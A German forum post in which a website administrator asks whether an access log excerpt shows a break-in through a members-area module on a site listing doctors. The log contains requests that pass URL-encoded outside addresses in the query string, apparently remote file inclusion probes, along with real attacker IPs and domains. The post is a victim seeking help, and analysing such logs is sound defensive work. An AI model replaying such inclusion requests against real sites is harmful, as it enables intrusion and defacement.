ganz sicher bin ich mir nicht ... kann es sein, dass der folgende Auszug aus meinen log-Dateien einen erfolgreichen Einbruch über das memberspages-Modul dokumentiert?
Hintergrund:
auf einer der von mir betreuten Seiten befindet sich ein geschützter Bereich. Die Seiten enthalten Adresslisten von Ärzten. Nicht zum ersten Mal ist mir aufgefallen, dass die Seiten korrumpiert waren. Einmal waren sämtliche Telefonnummern mit seltsamen skype-wrappern versehen, und dreimal waren die Inhalte aus der content.htm gelöscht.
Das letzte Mal konnte ich das auf den Zeitraum vom 4.6 - 8.6. eingrenzen, und tatsächlich gab es am 6.6. mehrere Angriffsversuche auf die Site, und zwar von den IP-Adressen 202.164.251.11 (aus Japan) und 85.74.111.113 (aus Griechenland). Was ja nicht viel sagt; sowas kann man fälschen.
Auffällig finde ich beispielsweise, dass bei den Zugriffen mit dem in das Argument der URL codierten Link nahezu 10 kB übertragen wurden - trotz Fehler 404.
Wie schätzt Ihr das ein?
Hier die Log-Datei.
Die beiden URLs habe ich ebenfalls angeschaut, die erste gibt es nicht mehr.
Code: Select all
202.164.251.11 - - [06/Jun/2008:15:22:53 +0200] "GET / HTTP/1.0" 200 31057 "-" "Mozilla/4.0 (compatible; MSIE 7.
0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:22:55 +0200] "GET /?http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fanaw
uho%2Fohuhiru%2F HTTP/1.0" 404 9490 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;
.NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:22:56 +0200] "GET /?http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublica
ciones%2Ffotos%2Femesuki%2Flewu%2F HTTP/1.0" 404 9526 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .N
ET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:22:57 +0200] "GET /?http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F
HTTP/1.0" 404 9456 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322
)"
202.164.251.11 - - [06/Jun/2008:15:22:59 +0200] "GET /?LITERATUR HTTP/1.0" 200 21907 "-" "Mozilla/4.0 (compatibl
e; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:00 +0200] "GET /?LINKS HTTP/1.0" 200 13844 "-" "Mozilla/4.0 (compatible; M
SIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:01 +0200] "GET /?TERMINE HTTP/1.0" 200 10768 "-" "Mozilla/4.0 (compatible;
MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:03 +0200] "GET /?PROGRAMM HTTP/1.0" 200 21108 "-" "Mozilla/4.0 (compatible
; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:04 +0200] "GET /?WER_WIR%0A__SIND HTTP/1.0" 200 9823 "-" "Mozilla/4.0 (com
patible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:06 +0200] "GET /?KONTAKT_-_IMPRESSUM HTTP/1.0" 200 11755 "-" "Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:07 +0200] "GET /?AKTUELLES&login HTTP/1.0" 200 31095 "-" "Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:09 +0200] "GET /?AKTUELLES:RSS_Feed HTTP/1.0" 200 1626 "-" "Mozilla/4.0 (c
ompatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:09 +0200] "GET /?LITERATUR&print HTTP/1.0" 200 21927 "-" "Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
202.164.251.11 - - [06/Jun/2008:15:23:11 +0200] "GET /?LINKS:Gesch%FCtzt%3A_Medizinisches%2C_Gutachter:Gruppen_u
nd_andere_Links HTTP/1.0" 200 11703 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;
.NET CLR 1.1.4322)"